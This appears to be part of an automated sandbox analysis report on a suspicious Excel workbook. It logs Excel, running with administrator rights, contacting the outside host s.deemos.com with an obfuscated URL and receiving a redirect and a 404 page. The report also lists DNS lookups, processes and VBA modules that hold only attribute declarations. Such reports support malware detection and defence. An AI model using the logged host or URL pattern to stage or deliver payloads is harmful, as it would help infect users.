                    Dec 20, 2024 16:05:20.127860069 CET4434981614.103.79.10192.168.2.24
                    Dec 20, 2024 16:05:20.127959013 CET49816443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:20.129460096 CET49816443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:20.129484892 CET4434981614.103.79.10192.168.2.24
                    Dec 20, 2024 16:05:20.130693913 CET4434981614.103.79.10192.168.2.24
                    Dec 20, 2024 16:05:20.130758047 CET49816443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:20.132455111 CET49816443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:20.132541895 CET4434981614.103.79.10192.168.2.24
                    Dec 20, 2024 16:05:20.132841110 CET49816443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:20.132860899 CET4434981614.103.79.10192.168.2.24
                    Dec 20, 2024 16:05:20.132893085 CET49816443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:20.144376040 CET49816443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:20.191359043 CET4434981614.103.79.10192.168.2.24
                    Dec 20, 2024 16:05:21.188205004 CET4434981614.103.79.10192.168.2.24
                    Dec 20, 2024 16:05:21.188260078 CET49816443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:21.188271046 CET4434981614.103.79.10192.168.2.24
                    Dec 20, 2024 16:05:21.188281059 CET4434981614.103.79.10192.168.2.24
                    Dec 20, 2024 16:05:21.188322067 CET49816443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:21.195036888 CET49816443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:21.195050001 CET4434981614.103.79.10192.168.2.24
                    Dec 20, 2024 16:05:21.196898937 CET49818443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:21.196913004 CET4434981814.103.79.10192.168.2.24
                    Dec 20, 2024 16:05:21.196980953 CET49818443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:21.198563099 CET49818443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:21.198575020 CET4434981814.103.79.10192.168.2.24
                    Dec 20, 2024 16:05:22.852582932 CET4434981814.103.79.10192.168.2.24
                    Dec 20, 2024 16:05:22.852653027 CET49818443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:22.854980946 CET49818443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:22.854994059 CET4434981814.103.79.10192.168.2.24
                    Dec 20, 2024 16:05:22.855401993 CET4434981814.103.79.10192.168.2.24
                    Dec 20, 2024 16:05:22.855457067 CET49818443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:22.856534004 CET49818443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:22.856611967 CET4434981814.103.79.10192.168.2.24
                    Dec 20, 2024 16:05:22.856662035 CET49818443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:22.856815100 CET49818443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:22.899362087 CET4434981814.103.79.10192.168.2.24
                    Dec 20, 2024 16:05:23.597887039 CET4434981814.103.79.10192.168.2.24
                    Dec 20, 2024 16:05:23.597913027 CET4434981814.103.79.10192.168.2.24
                    Dec 20, 2024 16:05:23.597939968 CET4434981814.103.79.10192.168.2.24
                    Dec 20, 2024 16:05:23.597948074 CET49818443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:23.597987890 CET4434981814.103.79.10192.168.2.24
                    Dec 20, 2024 16:05:23.598002911 CET49818443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:23.598022938 CET49818443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:23.598042011 CET49818443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:23.598813057 CET49818443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:23.598849058 CET49818443192.168.2.2414.103.79.10
                    TimestampSource PortDest PortSource IPDest IP
                    Dec 20, 2024 16:04:09.015593052 CET6115453192.168.2.241.1.1.1
                    Dec 20, 2024 16:05:17.501480103 CET5459553192.168.2.241.1.1.1
                    Dec 20, 2024 16:05:18.424280882 CET53545951.1.1.1192.168.2.24
                    Dec 20, 2024 16:05:56.212402105 CET5640353192.168.2.241.1.1.1
                    Dec 20, 2024 16:05:56.349145889 CET53564031.1.1.1192.168.2.24
                    Dec 20, 2024 16:05:57.234168053 CET5459553192.168.2.241.1.1.1
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Dec 20, 2024 16:04:09.015593052 CET192.168.2.241.1.1.10x9000Standard query (0)cxcs.microsoft.netA (IP address)IN (0x0001)false
                    Dec 20, 2024 16:05:17.501480103 CET192.168.2.241.1.1.10xd018Standard query (0)s.deemos.comA (IP address)IN (0x0001)false
                    Dec 20, 2024 16:05:56.212402105 CET192.168.2.241.1.1.10x1212Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                    Dec 20, 2024 16:05:57.234168053 CET192.168.2.241.1.1.10xc19cStandard query (0)assets.msn.comA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Dec 20, 2024 16:04:09.308499098 CET1.1.1.1192.168.2.240x9000No error (0)cxcs.microsoft.netcxcs.microsoft.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                    Dec 20, 2024 16:05:18.424280882 CET1.1.1.1192.168.2.240xd018No error (0)s.deemos.com14.103.79.10A (IP address)IN (0x0001)false
                    Dec 20, 2024 16:05:56.349145889 CET1.1.1.1192.168.2.240x1212No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                    Dec 20, 2024 16:05:56.349145889 CET1.1.1.1192.168.2.240x1212No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                    Dec 20, 2024 16:05:57.371979952 CET1.1.1.1192.168.2.240xc19cNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                    • s.deemos.com
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.244981614.103.79.104436888C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    TimestampBytes transferredDirectionData
                    2024-12-20 15:05:20 UTC272OUTGET /qjE1BcWg?&smoke=wealthy&comma=annoyed&tankful=wacky&literature HTTP/1.1
                    Accept: */*
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Host: s.deemos.com
                    Connection: Keep-Alive
                    2024-12-20 15:05:21 UTC397INHTTP/1.1 301 Moved Permanently
                    Date: Fri, 20 Dec 2024 15:05:20 GMT
                    Content-Type: text/plain; charset=utf-8
                    Content-Length: 38
                    Connection: close
                    X-DNS-Prefetch-Control: off
                    X-Frame-Options: SAMEORIGIN
                    Strict-Transport-Security: max-age=15724800; includeSubDomains
                    X-Download-Options: noopen
                    X-Content-Type-Options: nosniff
                    X-XSS-Protection: 1; mode=block
                    Location: /404
                    Vary: Accept
                    2024-12-20 15:05:21 UTC38INData Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 34 30 34
                    Data Ascii: Moved Permanently. Redirecting to /404


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.244981814.103.79.104436888C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    TimestampBytes transferredDirectionData
                    2024-12-20 15:05:22 UTC213OUTGET /404 HTTP/1.1
                    Accept: */*
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Host: s.deemos.com
                    Connection: Keep-Alive
                    2024-12-20 15:05:23 UTC448INHTTP/1.1 404 Not Found
                    Date: Fri, 20 Dec 2024 15:05:23 GMT
                    Content-Type: text/html; charset=utf-8
                    Content-Length: 4645
                    Connection: close
                    X-DNS-Prefetch-Control: off
                    X-Frame-Options: SAMEORIGIN
                    Strict-Transport-Security: max-age=15724800; includeSubDomains
                    X-Download-Options: noopen
                    X-Content-Type-Options: nosniff
                    X-XSS-Protection: 1; mode=block
                    X-Powered-By: Next.js
                    ETag: "1225-4lR+8o8+z0M1Iq6OMuNgxAtPjT8"
                    Vary: Accept-Encoding
                    2024-12-20 15:05:23 UTC3620INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 75 6e 64 65 66 69 6e 65 64 20 69 73 20 61 20 66 72 65 65 20 61 6e 64 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 55 52 4c 20 73 68 6f 72 74 65 6e 65 72 20 77 69 74 68 20 63 75 73 74 6f 6d 20 64 6f 6d 61 69 6e 73 20 61 6e
                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover"/><meta name="description" content="undefined is a free and open source URL shortener with custom domains an
                    2024-12-20 15:05:23 UTC1025INData Raw: 22 3a 5b 5d 2c 22 65 6d 61 69 6c 22 3a 6e 75 6c 6c 2c 22 61 70 69 6b 65 79 22 3a 6e 75 6c 6c 2c 22 66 65 74 63 68 65 64 22 3a 66 61 6c 73 65 7d 7d 7d 2c 22 70 61 67 65 22 3a 22 2f 5f 65 72 72 6f 72 22 2c 22 71 75 65 72 79 22 3a 7b 7d 2c 22 62 75 69 6c 64 49 64 22 3a 22 75 6d 32 32 67 32 4c 50 38 4b 6f 30 6a 6b 31 76 48 72 50 43 63 22 2c 22 69 73 46 61 6c 6c 62 61 63 6b 22 3a 66 61 6c 73 65 2c 22 63 75 73 74 6f 6d 53 65 72 76 65 72 22 3a 74 72 75 65 2c 22 67 69 70 22 3a 74 72 75 65 2c 22 61 70 70 47 69 70 22 3a 74 72 75 65 7d 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6e 6f 6d 6f 64 75 6c 65 3d 22 22 20 73 72 63 3d 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 72 75 6e 74 69 6d 65 2f 70 6f 6c 79 66 69 6c 6c 73 2d 35 32 61 35 66 39 32 30 32 36 65 66
                    Data Ascii: ":[],"email":null,"apikey":null,"fetched":false}}},"page":"/_error","query":{},"buildId":"um22g2LP8Ko0jk1vHrPCc","isFallback":false,"customServer":true,"gip":true,"appGip":true}</script><script nomodule="" src="/_next/static/runtime/polyfills-52a5f92026ef


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:10:04:22
                    Start date:20/12/2024
                    Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                    Imagebase:0x7ff7a90e0000
                    File size:70'082'712 bytes
                    MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:false

                    Target ID:16
                    Start time:10:05:25
                    Start date:20/12/2024
                    Path:C:\Windows\splwow64.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\splwow64.exe 12288
                    Imagebase:0x7ff79de00000
                    File size:192'512 bytes
                    MD5 hash:AF4A7EBF6114EE9E6FBCC910EC3C96E6
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:false

                    Target ID:19
                    Start time:10:05:56
                    Start date:20/12/2024
                    Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\MS100384UTC.xls"
                    Imagebase:0x7ff7a90e0000
                    File size:70'082'712 bytes
                    MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    Call Graph

                    • Entrypoint
                    • Decryption Function
                    • Executed
                    • Not Executed
                    • Show Help
                    callgraph 1 Error: Graph is empty

                    Module: Sheet1

                    Declaration
                    LineContent
                    1

                    Attribute VB_Name = "Sheet1"

                    2

                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                    3

                    Attribute VB_GlobalNameSpace = False

                    4

                    Attribute VB_Creatable = False

                    5

                    Attribute VB_PredeclaredId = True

                    6

                    Attribute VB_Exposed = True

                    7

                    Attribute VB_TemplateDerived = False

                    8

                    Attribute VB_Customizable = True

                    9

                    Attribute VB_Name = "Sheet1"

                    10

                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                    11

                    Attribute VB_GlobalNameSpace = False

                    12

                    Attribute VB_Creatable = False

                    13

                    Attribute VB_PredeclaredId = True

                    14

                    Attribute VB_Exposed = True

                    15

                    Attribute VB_TemplateDerived = False

                    16

                    Attribute VB_Customizable = True

                    Module: Sheet2

                    Declaration
                    LineContent
                    1

                    Attribute VB_Name = "Sheet2"

                    2

                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                    3

                    Attribute VB_GlobalNameSpace = False

                    4

                    Attribute VB_Creatable = False

                    5

                    Attribute VB_PredeclaredId = True

                    6

                    Attribute VB_Exposed = True

                    7

                    Attribute VB_TemplateDerived = False

                    8

                    Attribute VB_Customizable = True

                    9

                    Attribute VB_Name = "Sheet2"

                    10

                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                    11

                    Attribute VB_GlobalNameSpace = False

                    12

                    Attribute VB_Creatable = False

                    13

                    Attribute VB_PredeclaredId = True

                    14

                    Attribute VB_Exposed = True

                    15

                    Attribute VB_TemplateDerived = False

                    16

                    Attribute VB_Customizable = True

                    Module: ThisWorkbook

                    Declaration
                    LineContent
                    1

                    Attribute VB_Name = "ThisWorkbook"

                    2

                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                    3

                    Attribute VB_GlobalNameSpace = False

                    4

                    Attribute VB_Creatable = False

                    5

                    Attribute VB_PredeclaredId = True

                    6

                    Attribute VB_Exposed = True

                    7

                    Attribute VB_TemplateDerived = False

                    8

                    Attribute VB_Customizable = True

                    9

                    Attribute VB_Name = "ThisWorkbook"

                    10

                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                    11

                    Attribute VB_GlobalNameSpace = False

                    12

                    Attribute VB_Creatable = False

                    13

                    Attribute VB_PredeclaredId = True

                    14

                    Attribute VB_Exposed = True

                    15

                    Attribute VB_TemplateDerived = False

                    16

                    Attribute VB_Customizable = True

                    Reset < >